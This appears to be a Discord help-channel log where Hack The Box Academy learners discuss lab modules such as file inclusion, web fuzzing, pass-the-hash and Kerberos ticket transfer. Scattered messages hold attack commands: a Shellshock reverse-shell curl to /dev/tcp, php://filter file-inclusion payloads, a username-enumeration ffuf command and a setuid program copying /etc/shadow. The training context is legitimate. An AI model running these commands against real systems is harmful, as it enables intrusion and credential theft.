#modules

Yw !

Hey im trying to solve labs in file inclusion prevention section from file inclusion module the 2nd question required me to edit php.ini file to block system() for me to execute a payload

I cant seem to find the place to edit block system() command within that file any help?

In Intro To Network Traffic Analysis Module Interrogating Network Traffic With Capture and Display Filters section:
What are the client and server port numbers used in first full TCP three-way handshake?

I figured out the answer, however, I am confused it says first full TCP three-way handshake so shouldn't that be ||the server at 207.244.88.140? That specific server is the first one to acknowledge but the correct answer isn't that server not even the very first SYN flag but the one right after which is on client's port 43806. Why?||

personally i use vim for search the variable for block system() /disable_

Has anyone made any progress on the web fuzzing skills assessment? I've tried a recursive fuzz and only found one directory. Can't do a subdomain search as I don't have the domain name, and I'm denied from accessing the one directory I've found. Any help on next steps will be appreciated

Feel free to dm me if you’re still stuck

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/com/ I have a question, in this case, wouldn't it be necessary to add each subdomain to etc hosts and map it to the given target IP address?

In this case no

Inlanefreight.com is a live website

[It's a fake company]

oh then accesable for everyone

Yep

ok ty bro you always have the answer

And routed on the public internet

@fathom pendant you woman or man?

Yes

https://tenor.com/view/the-road-to-el-dorado-both-both-is-good-gif-8304204

Can i get help with web fuzzing skill assessment

I am stuck after godeep fuzzing

I found 2 urls but they are not working

But in the case of publicly accessible addresses, is the value of /etc/hosts also changed to change the value of the hosts header and find virtual hosts associated with an IP address?

You mean in the cases of docker containers or websites in general

Either way. The /etc/hosts file isn't changed dynamically

With ffuf you're manually manipulating the host header, which would be the header used when visiting a website

And in the case of not manipulating the header

Ffuf is literally just checking for 404/other indicators a site doesn't exist

I cant run the url on my browser

Cant even curl it

Did you add the subdomain to your /etc/hosts?

Yes i did its still not working i dont know why

I added both hidden and fuzzing but didnt help

I need help with Web Attacks - Bypassing Basic Authentication. I'm trying to see the supported http headers.

The module suggested to use this syntax:

curl -i -X OPTIONS http://SERVER_IP:PORT/

However, I still can't see the allowed headers.

Are you trying https and not http?

the i need to be uppercase

Yeah options doesn't work

http and it gives 404 not found

I don't know what to do at this point 😦

Do something else

Read the whole section

They give you some verbs

Hey im doing the skill assesment section in file inclusion module i try to get the base64 encoded string like in an earlier section of this module but im not able to get it

Any insights on this?

Thanks for the hint. Done the first part. 🙂

yoo , doing ADCS attack , ESC10 anyone was able to perform the attack from windows ? , the module didn't cover that , I just want to make sure that is possible to do the attack from a windows machine

Any clue on skill assesment local file inclusion

Nope

how come?

[S]
[S.]
[.]

Is the full handshake

damn

I thought [.] means no flag

Synack is just saying that they acknowledge the synchronization of timing, MTU, and other such important datagram modules

but its weird how tcpdump shows ACK flag

alrighttt thanks man

. Is a common placeholder for ack

https://amits-notes.readthedocs.io/en/latest/networking/tcpdump.html#flags

the docker containers are accesible for everyone no?

much appreciated

Yes

I was just confused by your wording

With the docker containers, you're not gonna get anything by doing -u http://FUZZ.test.local

You need to manipulate the header

The header informs the server you're sending to, what resource location you're requesting

Most vhosts are set up in /var/www/<vhost>/

It worked on browser now

But now am clueless

Change anything? Otherwise chalk it up to something being dumb

The stoneedge one shows on browser almost there ?

Changed the machine

It means you didn't go deep enough

Don't use any recursion limit

Oof

The flag will be given to you at the end of the road there

Thanks for the help

Can Anyone help me with the skill assesment section in file inclusion i tried to check php configurations like in an earlier section in this module

But i am not geting any base64 encoded string

https://academy.hackthebox.com/module/51/section/1640 In this section on Python privilege escalation, why do we need to run a file with privilege escalation code when we already have sudo python permissions? Why not directly use the privilege escalation command?

Make sure you are looking for it properly

check with sudo -l which rights you really have

Because it won't look as suspicious

But also as payload said

Iirc it's php://filter/base64.encode/resource=[file]

You may also need to bypass some filters @limpid hemlock

I tried http sever port/index.php?page=php://filter/read=convert.base64-encode/resource=php.ini

Why are you trying to check the ini?

Why not the index?

Also note this goes by the cwd

php.ini might not be in the cwd of the webroot

Ya i tried a whole oath like i did in pho wraper module

@fathom pendant So both Docker and web pages in general work in a similar way in terms of how they treat headers to return a certain response, with the difference that web pages have those domains registered and by being on the authoritative servers of the domain providers where they are located, they can be found publicly through the DNS route?

Php wraper section in this same module There i got a base64 encoded string to check if allow url include was possible

I was trying to solve this like that

Way

with the docker i mean the HTB ones

you don't need the read=

php://filter/convert.base64-encode/resource= is what's given in the module

sort of

at the end of the day

Ya i tried that the index showed a hidden page

the Host Header tells the server where you're intending to look

and did you look for the hidden_page/index.php?

:)

Yup

You don't need to visit the hidden_page to find the hidden_index btw

Just set the php filter you've already identified resource= to the discovered dir/index

It's that easy

Im newbee i dont quite understand everything

Any hinits for api attack skill assessment?

What exactly is not working?

I think uploading cv form for supplier . I just needs a hnint for that i trying that all day but i can’t solve it yet

Send me a DM so as not to spoil anything here. Tell me what exactly you did

Yes sir i will send you

i finished the AD enumerations and attacks skill assessment 2, but im kinda confused on the way we had to get domain admin.

Why would i need to run responder on the windows host?

Wouldnt the multicast go to everyone on the network?

The llmnr attack seemed way too targeted imo but i guess its hard to simulate it without going to all host. maybe i dont understand it fully

responder is just listening for requests that are being sent; generally either from broadcast or multicast

the poisoning it does is basically saying "Hi i'm here, are you there?" which receives a response (i'm probably way underrepresenting it)

having trouble with this question in Footprinting/DNS What is the FQDN of the host where the last octet ends with "x.x.x.203"?

subdomains of subdomains

yeah i understand that, but i felt kinda weird cause there was def a script only targeting specific ip addresses, which wouldnt much sense irl right?

what script?

:P responder doesn't run any major scripts aside from standing up services to pretend to be

i'm trying to brute force one particular subdomain, of which the last octet ends similarly, with dnsenum and the bash script, and getting nothing. And trying zone transfers with dig but it's like "host unreachable" 😵‍💫

im just guessing that there is a script on 2 of the workstations targeting 2 specific ip addresses

dnsenum is the way to go

make sure you use a fierce wordlist

it's not entirely unreasonable

¯_(ツ)_/¯

okay, i'll keep trying with that then

like net use \192.168.5.56\ every 2 mins

Think about which subdomain could be a zone. What would make sense if you were to manage it separately

that's just a script to make sure it's able to connect to a network share

that's not uncommon

and stay connected

yeah ik, just felt a bit too targeted i guess

not really? ¯_(ツ)_/¯

wouldnt have thought of running responder on a compromied machine

i mean it's a tool you're taught to use in the module

so it's not out of the ordinary to try and use something

¯_(ツ)_/¯

remember enumeration is iterative

you keep iterating your enumeration and exploitation until you reach the end of the rainbow

yeah

so you'd run your enumeration tools

¯_(ツ)_/¯

simple as

yeah I was phased out by that too as they presented responder as something that responds to multicast/broadcast requests, not unicast

it responds to any request

¯_(ツ)_/¯

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' In this command, wouldn't it be necessary to modify /etc/hosts? Just with the IP since the header is already being changed anyway?

but how ur machine will resolve academy.htb ?

in this instance you could either;
A: in /etc/hosts -- put the ip domain
B: in the request use the ip:port

your system still needs to know how to resolve the domain

the HOST header just tells the ip/domain you're looking at what resources you're specifically looking for

i.e. support, www, store

and the host says "oh yeah that's over here" and directs to the right resource

yo

no i just copy paste that i was thinking something like this: ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://TargetIP:PORT/ -H 'Host: FUZZ.academy.htb'

but if you want to browse to the found subdmain, you'll need it in your hosts file

yes that will make it more simple thank you

Im trying to answer "Windows Attacks & Defense/ PKI - ESC1 / question 2". Im pretty sure i have the correct answer but it keeps on giving me wrong answer. The answer im trying to provide is "12/19/2022". Any help is appreciated

am on password attack module on "Passwd, Shadow & Opasswd" but will password has refused to work. any help thanks

http.server

hey i'm new to cybersecurity and i just started htp sites to start and i faced a problem with the linux fundementals part where it asks be to ssh to htp-student when i type the password it says premission denied i used both the browser room and set up the vpn one and generated multiple ids from the exam and the problem is the same

do you mean htb-student?

yep

because you typed "htp" twice in that sentence. I'd start by making sure you've got that character correct for the username.

i type
ssh htp-student@ip

you are confusing "p" with "b".

whait

Hi guys and gals, i am currently busy with the DNS part of the footprinting module and would like some advice, when i run the dig command, i recieve a Warning: recursion requested but not available, is this part of the of the practical or is this an indication that i went wrong with configuration?

need more info

also with dig you need to specify the server, since inlanefreight.htb isn't a publicly routed domain

can i hit you with a dm of command and response i receive?

https://tenor.com/view/john-mulaney-fine-gif-1470523405000260322

yeah

it doesn't have internet connectivity

yes gotcha

any box or workstation you will ssh/rdp into will not be connected to the outside world

keeps disconnecting every minute

oki got it

/timeout:9000

also you don't necessarily need to rdp into it; ssh works just fine

To use tools like wireshark I have to but anyways thanks for helping

1: wireshark isn't required 2: wireshark can be run from the CLI iirc

Almost through Attacking Common Apps

Your good progress, good luck 🫡

I’m at the level of tomcat cgi 😅

It's not that bad

Imo don't be afraid to pull up the guide for the retired machine "fatty" for the thick client section that deals with Java

Because that section was like pulling teeth trying to understand it and the "why" behind some of it

(Because its not explained)

you are talking about cgi or another section

read my statement carefully, lol, but not CGI

every other section was easy (relatively)

the thick client comes out of NOWHERE

ah I see I’m not yet at the, but I understand lol, ya nothing that I hear "java" the neurones start to see blurred

imo it is NOT FUN

and i'm pretty sure that take is as cold as ice

I can't imagine how hard it would be for someone like marcie to watch me go through these modules. I often find the answer and not realize it, and proceed to spend another hour frustratingly searching for the answer that i've already found.

been there, done that, got the t-shirt

❤️ i feel the struggle

you also have to realize when i'm helping others, i'm helping through the lens of hindsight

CPTS t-shirt soon

i sure as shit didn't get through all the modules so far without some level of skill issue of my own

it's why sometimes my hints refer specifically to what tripped me up when I did it

shiiit the footprinting module with the hard lab... i completely forgot about the one service...which would have saved me so much time

some of the exercises in Injection Attacks are brutal if you fail the knowledge check

If we have CPTS send us a shirt?

it's a separate package you order

$20 + shipping

(depending where you are shipping may be the cost of the exam itself )

you can order it in the My Certificates page after you get your cert

https://hackthebox.store/products/hack-the-box-cpts-certification-package

took a nap, came back and got it in like two seconsd

it's good 20$ when I’m going to have it I’ll frame this fucking piece of paper because he made me fall several times

also thank you @acoustic owl for giving me more direction on how to think about this

That looks good!

yup. CBBH also has a cert package

CDSA and CWEE are planned to get their own by EOY

LMFAO i completely guessed for q1/2 of the skill assessment 1 as the target was spawning

i can't even rn

brug..

it was a total shot in the dark for 1 then it was an educated guess for 2

CBBH, I think to pass it after the cpts I would see according to my objectives

CBBH is fun. def recommend

okok according to my friend who got the cpts we are around 60% of the CBBH so yes it's worth it.

What was ur experience before taking these exams

3 is crazy

my major is cybersecurity with a specific focus on network and endpoint security

it's a great foundation for bug bounty/web pentesting

with the new modules replacing the old ones, the quality of the content will significantly increase

here with the module name, section name, and what you're stuck on alongside what you've tried

being vague only hurts your cause

https://tenor.com/view/that-is-incredibly-unhelpful-isaac-goodwin-sex-education-that-doesn't-help-me-at-all-that-is-useless-gif-12372771945317590256

It helps to (without spoiling the environment) state what you've tried so far

you can also utilize the search feature in discord to see if others have had the same question

https://academy.hackthebox.com/achievement/667914/113 it has been achieved Victory is mine

https://tenor.com/view/spongebob-speech-love-victory-screech-gif-5464277

gj marcie 🙂

i will say

the third lab

was really disappointing imo

I've been wanting to get into bug bounty and it's perfect timing 😉

that looks hot my god

nah just...not a lot to it tbh

the second assessment was the juiciest

also might throw some feedback for it, since it looks like the third assessment was lifted from a retired machine (logged in and saw root.txt...) regarding giving a bit more clear instructions on where to find certain things like the .dll (though not necessary to search) you're meant to look through

even doing it slightly differently it's still a tad underwhelming (but that's my 2 cents, and i'll probably formulate it better somehow someway for /feedback)

Hey fellow hackers

Is there a way to reset a module in academy?

ok I see I’m not yet at but I take note in case it can help me

Do you mean like, reset the progress you have made?

No

I swear that needs to be pinned

Curious why you'd want to reset your progress TBH, but I guess that question has also been asked a lot 😅

Well it's probably due to when modules get updated, the answers don't wipe, and they often don't match the new expected answers

Fair point

Well, saw that a module got updated, did the new sections and went ahead to finish the skill assessment, I think it’s bugged, the new questions got the past answers and didn’t not match with the new ones

^

🙂

Exactly

We're always open to /feedback

It goes directly to the HTB team

There's a firefox extension in #resources-tools that someone's made that pseudo does that

Looking at that really triggered my OCD

Oh really?? Cool, thanks

Also, I think that a “reset” button that wipes all the answers but doesn’t wipe the overall progress on the dashboard would be great, you know, just to refresh the knowledge, sometimes I take a look back at a module but feel something is missing because I can’t input the answer again and get that dopamine rush

Eh

It's easy to get caught up in the dopamine rush

It is

But there's no point in resubmitting the same answer

Well, I've passed on the feedback RulOpsSec, I imagine the team have heard it before and likely have had some discussions regarding it, but chucked it over the fence just in case

Really appreciate it!

G0blin bullying the dev team

Likely though it's a backend issue

Database storage for the answer key or some such

Do you have an example module / section RulOpsSec?

Bully? Nooo... provide feedback

🙈

The information gathering - web edition module

Which was temporarily renamed to Web Recon

Exactly, that one

Do you recall the extension name?

It's literally posted there earlier today

Idk if it's on the ff store

Gotcha, appreciate the help

guys there a things i dont understand about the reverse shell curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/7777 0>&1' http://10.129.205.27/cgi-bin/access.cgi here, that makes reference a can like log poisoning (because we attack a User-Agent) as lfi or it is really the bash environment that is vulnerable according to its version of which it is possible to have a reverse shell, for this section : https://academy.hackthebox.com/module/113/section/2166

I'd advise reading up the section a bit @marsh echo - you'll find what the reasoning behind this request is 🙂

Yeah the reasoning is actually given (shellshock)

yes may be I misunderstood :/ but I got the shell

If so, have a re-read of that section

Solidify your understanding before moving on, it's not a race 🙂

of course 😉

Read up on the actual vulnerability being abused here; shellshock

https://nvd.nist.gov/vuln/detail/CVE-2014-6271

yes I saw, thank you I will reread it before sleeping, but I told myself since the user agent is attacking is what was the same kind of attack as log poisoning that LFI ( because it’s me remember this) but I have gone too far in my reflection lol

Looks like for apache it's abusing mod_cgi / mod_cgid

thx I understand better

the privesc modules; Doc&Reporting; and then AEN

https://tenor.com/view/so-close-i-could-taste-it-near-almost-close-kate-mc-kinnon-gif-13014007

guys, who has some articles about ssrf vuln and how to exploit it in diff ways?

ahah I think we're going to take it at the same time (well I think you'll take it a few days before), btw how do you plan to revise?

well gotta go back and refactor my notes and such anyway

so

¯_(ツ)_/¯

early on i was pretty lazy

then i got less lazy

then lazy again

...

it's not consistent

ahhah I understand you, but it was when I had finished AD that I did a lot of hanging around and then I went back to work, but I made the mistake of doing my notes badly before AD, so I'm thinking of redoing my notes from now on.

it's not bad to go back over notes

see what makes sense and see what doesn't

as the mindset you had when initially writing things down may be different now

idk why i’m having so much trouble with footprinting. FOOTPRINTING.

and something you wrote might look like nonsense to decipher

what section?

but it's the home stretch, you can't let go

that's exactly it!

I look back at some of my highschool hand written notes and am like "wtf was I on?"

SMTP. Can’t get user. I’ve used the wordlist from resources manually with smtp-enum-user and with metasploit, and with the metasploit wordlist in metasploit. And i just get nothing?

it’s working because i’m getting output. just no matches.

tried resetting the lab a couple of times.

smtp can be a slow service

and i’m stubborn as hell trying not to ask for help lol

Damn

also using the right method as well can be helpful

Cpts soon

i'd have to be sure i can have 10 days of no major life disruptions first

How long you been study ?

lol true

https://tenor.com/view/longtime-titanic-84years-gif-5134219

a little over a year; but i had a good 4-5 months where I couldn't really study

no internet and such

but that's exactly it i went back over one of my notes to help someone even i didn't understand my notes there wasn't enough precision it forced me to redo the exercise to understand better and it took 5 minutes

Woow but you did it

Almost done

should i be using nse script instead? or just brute-forcing manually in telnet? lol

10 days kind of long ngl

Specifically if you adult

not manually

god no not manually

and nse scripting is a pain in the ass

use the smtp-user-enum tool

Marcie
You have job ?

no

Woow hopefully you find one soon

I got IT job recently

No certs

i keep checking my email

but my Nigerian Prince hasn't delivered

I apply for that job 8 times the one I working right now

💀

Pay is not bad

You from USA correct ?

smtp-user-enum -U /usr/share/wordlists/footprinting-wordlist.tx -t <Lab IP> -m 150 -M VRFY is what i’ve been using

yes

-W or -w 25

and auxiliary/smtp/smtp_enum or whatever in metasploit.

metasploit was like, user found: nobody

i forget which is the timeout waiting

okay. i’ll slap that flag on there lol

either -W 25 or -w

you can always do smtp-user-enum -h

to see the command flags

yeee

thanks marcie. i owe ya. i’ll cut your grass someday or something lol

How often do I need to re-download the VPN packs?

never

CPN isn't a thing

the vpn packs however

only when you change regions

hm weird

why?

Ran into a couple issues today and yesterday with the VPN

(if you're using the in-browser pwnbox, the answer is never)

change vpn regions then ¯_(ツ)_/¯

yeah i just scanned from kali and nada

scanned from pwn box and results

well

the other dumb question is... were you connected to the vpn?

yes

so you had a tun0 ip if you ran ip a

yes

¯_(ツ)_/¯

🤷‍♀️

do you have the pwnbox on while also being connected to the vpn at the same time? if so that causes problems.

nope, opened the pwn box after running into issue

have you recently changed regions on the vpn

^

not unless it changed itself

have not touched the VPN setting from default

if you do head academy-regular.ovpn do you see [edge-]us-academy-2

yup

remote edge-us-academy-2.hackthebox.eu

Just re-downloaded the back and it works now

I just redownloaded it last night too though

¯_(ツ)_/¯

Password Attacks-Credentials Hunting in Linux.

I already SSH's in Kira, and have moved laZagne.py.

But when I type "python3 laZagne.py all" on the host I get:

"Traceback (most recent call last):
File "laZagne.py", line 17, in <module>
from lazagne.config.write_output import write_in_file, StandardOutput
ModuleNotFoundError: No module named 'lazagne'"

Any help?

well, it says you're missing the lazagne module. you could try installing it.

you can't run the script if it's missing an import. the host you're on doesn't have the lazagne module installed

oh you're remoted into a box so probably can't install it

probably not

Yeah, I did that. And apparently I'm not the only one running into this problem.

i don't really recall that specific module, but it's probably safe to say it doesn't require lazagne to move forward if it doesn't work on the victim box.

Hmm

you don't need lazagne

there is another tool that's showcased in that section

Can I DM someone? I think I am close to the right answer

which is why the terminal output was banned from this Discord server

just articulate your problem here

I just solved it on my own never mind

It’s not

It was a false positive with another rule

How do tools like fluff prevent their IP from being blocked when sending so many requests from the same address?

It depends

They don't do really anything to prevent getting blocked

But you can limit your rates and such so as to attempt to not trigger any WAFs

i'm so close, yet so lost. At the last question that's not the bonus question for the Pass the Hash (PtH) module in password attacks. i pass the hash attack with user julio and respective hash, then i set up an nc listener to powershell, then i go to my pwnbox and get the output from the reverse shell website, this is where i am confused. Do i set up another powershell tab and let the nc run? i did this and ran the big Invoke command, and it says "Command executed with process ID 4708 on DC01", but then that's where im stuck, i don't see a reverse shell pop up

Did you set the right callback ip

Make sure you use the right interface

ummmm, am i supposed to set up the netcat listener on my pwnbox, or within julio's rdp?

netcat is the listener that catches the reverse shell

it's receiving the incoming connection

righttt, so it would make sense to set that up in my pwnbox, right??

correct, the revshell powershell script will initiate the connection

Well

In this case

The internal host has no route to the pwnbox

In this case no

ahh yeah if there's a pivot host you'll need to tunnel through that

ya i'm seeing that, "To get a reverse shell, we need to start our listener using Netcat on our Windows machine"

Set it up in the host you're rdp on, C:\tools should have nc64.exe

@fathom pendant During a engagement what you use to take notes, I have tried with plain text and with cherrytree however I have not adapted to those

I use obsidian for my note taking but I'm not in this line of work (yet)

https://obsidian.md

i also use obsidian, it's very nice

right, so i rdp hash attack into julio, set up netcat listener in powershell in julio rdp, i go to the reverse shell website and put in my target ip and get the script shell, then i go back to julio and...this is where i'm confused

You don't put the target ip in the revshell

You put the ip that would match the interface that's calling out to the dc

(ipconfig)

172.16.x.x I believe

ohhh, so i put julio's ip in the reverse shell?

I'll try it with Obsidian, I've used it for years but not for this kind of things. Now that I think about it, Excalidraw or the integrated canvas could be a good option.

than k u

172.16.1.5

Specifically the ip that's on the same subnet

Yes

that is a private address?

Indeed

whoa

Often the internal network of the private machines are on the 172.16.0.0/24 subnet

so am i supposed to have one powershell running the netcat with julio, and a separate powershell running the reverse shell command within julio also?

or do i need to be running netcat in cmd, and run the reverse shell command in powershell?

I've been waiting for a long time. What's the problem?

asking me?

happened to me once, i started another machine in a different section, terminated it then went back to the previous one that wasnt working and started that

somehow it worked then

yeah

Okay, but I don't think I started the other machines.

i'm having such trouble trying to get this to work, i'm not quite clear on what the point of the reverse shell website is, maybe that's where i'm having the problem, is it just so i can get the script so i can copy/paste into the reverse shell command?

yes

ok so then that shouldn't be the problem for me then

then u run it as the command in wmiexec

wmi is probably one of the last method i'd try

or one of the last at least. try smbexec or something instead.

yea that should work

unless u got the ip wrong

did you load the invoke-hash module first ?

me posting this here worked, i'm missing the quotation at the end 🤣 😭

lol

gg

true, just going by the example shown

i hate everything right now

I got the flag! Man i feel like every module in this password attacks is a struggle.

feels good. you're learning it sounds like to me.

I sure am. I really want that progress bar to be moving so much faster than it is.

marathon not a race

it takes time to actually commit it to memory and gain skills

Facts. I think I will be more proud to pass this certification, than every certification combined through WGU.

i do wish i could just implant knowledge like johnny mnemonic though

just completing the course, not even the exam, is an accomplishment

100% agree

why i cant extend my instance any longer

For the mini module Using Splunk applications the sysmon add on they suggested has been archived and no longer supported. is there another one i should be using instead?

there's a maximum time limit you can't just extend it forever. you can terminate it and respawn it.

hey can i ask some question regarding Pass the Ticket (PtT) from Linux as i am not good in chisel

The enumeration lasts longer than the time that the pwnbox lasts

i don't recall any module like that

Yeah... which VPN are you on, and which module / section @plucky hollow ?

Wym?

the Skills Assessment of web fuzzing / Attacking Web Applications with Ffuf, the issue is that analyzing everything recursively takes a lot of time

ffuf is pretty fast, it doesn't take hours to do that at all.. i think it was like less than 20 or 10 mins for each thing

If it can’t be found within a few minutes, you’re usually on the wrong path

What is the maximum number of simultaneous threads that you recommend I use with ffuf?

i don't think i changed the threads when i did it

you have over 4300 errors

so you're probably not doing something right

i was replying to tomrider36 not you sorry

generally one of the following will fix connection issues. you can do all of them too and it'll probably fix it. terminate the target. disconnect from the vpn -> download a fresh vpn file. restart your host machine. reconnect to the new vpn file, spawn the target, wait 3-5 mins after the target spawns.

in my screenshots from ffuf i don't have any errors

ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:47681/FUZZ -recursion -e .php7 -v

hey i have one question in Pass the ticket in linux Question is Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished.

here i get the linux01 flag how can i transfer the ccache file of julio

?

i like scp

Heyy

I have a doubt , I am learning ethical hacking and I am new in this field and I have windows pc , should I replace my windows with Linux or use linux as Virtualbox?? Please suggestions @everyone

either works, but being practical a vm is probably better

?? from linux01

Ohkk , thank you, are you a ethical hacker too?

do you have hackthebox account?

I don't have the premium membership

idk about that particular module. i thought you were talking about a transfer to a linux box, i like scp for that. if you're transferring to windows i like the /drive parameter for xfreerdp.

no bruh thats not the case here i can access linux01 through smb

@fathom pendant big boy help me

what? you asked how to transfer a file.

thats the question

your prompt says to transfer from linux to your attack box. isn't your attack box linux?

yeah i answered it, scp for linux transfers

ya but i can access the user linux01 through smbcient

Can please someone help me here too ? 😭

so?

with what

With some guide for hacking

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

try htb and get a vm on virtualbox and learn some linux u’ll have to get used to shell

I know a very well Linux and from where I can learn she'll???

it just means cmdline

Ik that

if u know then u can start the cpts module for pentesting

Cpts??

Read the link above

@storm elk where?

ye the cpts pathway

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

This ⬆️

Thanku 🥹

you can ask that question without the screen shot, and posting something like that is against the rules unless it's a tier 0 module

Crap sorry @plucky hollow - got totally distracted

Give me a sec.

This is your command?

svc_workstations@inlanefreight.htb@10.129.17.154's password: 
scp: remote open "/tmp/krb5cc_647401106_HRJDux": Permission denied
                                                                      ```

yes

your problem says permission denied, so a permission issue

sudo

Are you on the first question tom?

the error suggests svc_workstations doesn't have permissions required to read or access the file on the remote machine

Oh, no of course you're not

Question 3?

omg

after like 30 minutes the pwnbox just close connection

yes

trying to identify pages

Ah ok

test .php .phps
archive / courses .php .phps /index.php/courses/index.php
faculty / courses .php .phps .php7 /index.php/courses/index.php

can i dm you ? in that way i can explain more

nvm.. tom, let me DM, take it out of here

Ok

i'm actually just about to go to bed

Bro can anyone give me HTB subscription 😭

ok @ocean night you??

they have giveaways and you can win them in #giveaways

Ohkk

No access

yeah you have to go through the #welcome section first before you can access other discord areas

Can u use http server?

Connection refused

i am kinda confuse here i have done prev one easily now additional question says bash Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished.

Please read #welcome and #rules 🙂 it will explain how to get verified

here from ````LINUX01```

Ohk

root@linux01:/home/svc_workstations@inlanefreight.htb# id
uid=0(root) gid=0(root) groups=0(root)

here i am root now and for accessing LINUX01 i can use smbclient

root@linux01:/home/svc_workstations@inlanefreight.htb# smbclient //dc01/linux01 -k
Try "help" to get a list of possible commands.
smb: \> ```

but i have no idea how can i transfer the julio ccache to my local machine

i don't get it, are you tunneling or something?

I’m trying rn

there are many ways to transfer files

Did u use chisel and proxy chains?

smb share, python ftp/http server, scp, powershell

i think its fnext step ? like first i have to download the ccache file

i have ececute the chisel from rdp but in order to add the file in env variable i need julio ccache

yeah i used scp for that part

it's the answer i gave you before, the user svc_workstations doesn't have permission to grab that file. you need to grant permissions.

once they have permissions, use scp to xfer

Yeah u need permission to transfer

I can transfer things that the user owns

like how can i grant permission like i have to grant permission for that specific file or what?

yeah, the user doesn't have permissions to touch that file. you're root on the box, you can modify the file permissions.

ohh okok thanks man !

still goes by ADN Sec? Amazing!

how many modules done so far?

jekyll took a day to understand and set up

smh

Hey im having trouble in thefile upload attacks upload exploitation section i created a webshell uploaded it downloaded it and ran cmd in that url but nothings happening

https://academy.hackthebox.com/module/113/section/2154 Q:What credentials were found for the local database instance while debugging the octopus_checker binary?

how to solve it?

But it's the every hackers thingy.

Had some technical difficulties but thank god I got through it

Not much support for plugins imo

Yep, but you deployed it now right?

Yes but just for testing purposes, I'm trying to just make my technical writing skills better

Keep it up, let me know when you publish your first blog.

Any help

#welcome Get your self verified first.

Need screen shots of the situations and what u did

Yee ofc

DM.

if a root user creates a file cmd
cp /etc/shadow /tmp/.
and then set suid bit, so if run this using another non-root user, it says peremission denied

but if the root user compiles this:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
setuid(0); setgid(0); system("cp /etc/shadow /tmp/.");
}

and sets suid bit, and if run by another user then it works, how? and why?

Iam doing the Linux fundamentals and logged in with ssh to the htb student.
But when i do the ls command it doesnt show me anything

U might be in an empty directory

Try ls -ail

This command can show hidden directory

That start w .

Im in the home directory

it says bash_history
Bash_logout
cache
gnupg
bashrc

root

Yup 😉

but it shouldnt be empty .
What is the path to the htb-student's mail?

I found some forums with the solution but when I ls i see nothing

probably because there are only hidden files inside your home dir

Move through those directory

There is a well known command

ls -a will show everything

I cant if i try to cd into it says there is no such directory

you have to find the dir some other way

you can try checking your environment variables, maybe there's one for mail dir

Tbh I'd just use a find command 💀

try submitting that for the answer

It worked.
Kinda crazy though since the didnt really explain it

much appreciated for the help

If u used pwd

U would have seen it

If that's in the section

pwd only showd home/htb-student

if you ssh in, you'll be in your home dir, so i'm not sure how you'd find it using pwd

Ye mb thought it was /home/mail

Didn't see the var

Guess that's my sign to sleep

that dir would be for a user named mail..

Ik

Just saw home/mail 😭

Sleep well haha

Hi, is there any one finished the Active Directory Trust Attacks Module?

I always get Access Denied when gathering the flag.txt file after a successful attack.

Why is the Introduction to NTA module's Wireshark section so confusing? In Guided Lab and Packet Inception most of the time I was wasting time on Live host whereas the task was in the resource file or vice versa.

Hello house pls I need help on task 2 of Intro To Assembly Language Skill Assessment

The above server simulates a vulnerable server that we can run our shellcodes on. Optimize 'flag.s' for shellcoding and get it under 50 bytes, then send the shellcode to get the flag

I have optimised the asm code below 50byte as said and modified the code to be null bytes free yet when I paste the payload to the server I got failed to run shellcode

This it’s frustrating me pls any hint even if I can dm the person with my modified asm code

Section : Web Fuzzing
Skill Assesment
I fuzzed the given ip and found /admin/ then i fuzzed /admin and found a few more pages but they say acess denied but am clueless for the next step, can anyone help?
i also found panel.php but when i browse to that website, it says Invalid parameter, please ensure accessID is set correctly

Broken Authentication Skills assessment

trying to get a valid username: There are 2 regexp, one is "Invalid credentials." for a valid user and an invalid pass, second regexp is "Unknown username or password." for both an invalid user and an invalid pass

This is the command i used:
||ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://83.136.252.88:42502/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=Password1234" -fr "Unknown username or password." -mr "Invalid credentials."||

ran it 2 to 3 times still couldnt get user, what am i missing here?

Hey have u completed web fuzzing?

Nevermind, just got a hit for the user, should've just waited a few more mins before asking lol😂

Nope

Section : Web Fuzzing
Skill Assesment
I fuzzed the given ip and found /admin/ then i fuzzed /admin and found a few more pages but they say acess denied but am clueless for the next step, can anyone help?
i also found panel.php but when i browse to that website, it says Invalid parameter, please ensure accessID is set correctly

@stiff socket

Hey guys
Im stuck on skill assessment for broken authentication
can someone give me a nudge for otp?

Can someone give me a hint with a problem of resolving the question in the Web enumeration module (Getting Started). The hint from HTP sounds - Everything you need to login is given to you...but I tried looking at the source page, no login is saved. I need some help, but no direct solution, please.

Take a look at the module, it explains how you can bypass things

In which section?

Getting Started Module - Pentesting Basics - Web Enumeration

Check the module again. It will show you how you can obtain credentials

Hey, if u dont mind, can u help me with skill assessment web fuzzing?

Haven't done that module but, isn't that just hinting you to use the ||accessID parameter to the GET or POST to your || request

i have some clue

What exactly is the problem? What is not working?

i tried to fuzz acessID alone as well

i fuzzed the given target got /admin/panel.php

but when i visit it says make sure the acessID is set correctly

I did the bruteforce isn't working for it asks you to login again after 3 attempts.

You have already used bruteforce and the module shows other things. Not everything can be forced with bruteforce.

Yesterday I gave a try for a random created target from HTB with nmpa. I found that the targets port, which was listed on the HTP was not hosting web server. I found that this was other port...and after that I stuck getting the login data. But today, with new target, I can't even access the web panel, as I don't get the right port for web server.

what does it say?

The website tells you what you need to do 😉
|| fuzz the accessID ||

i did

nothing so far. fuzzed both GET and POST methods.

If the value is correct, you will get further

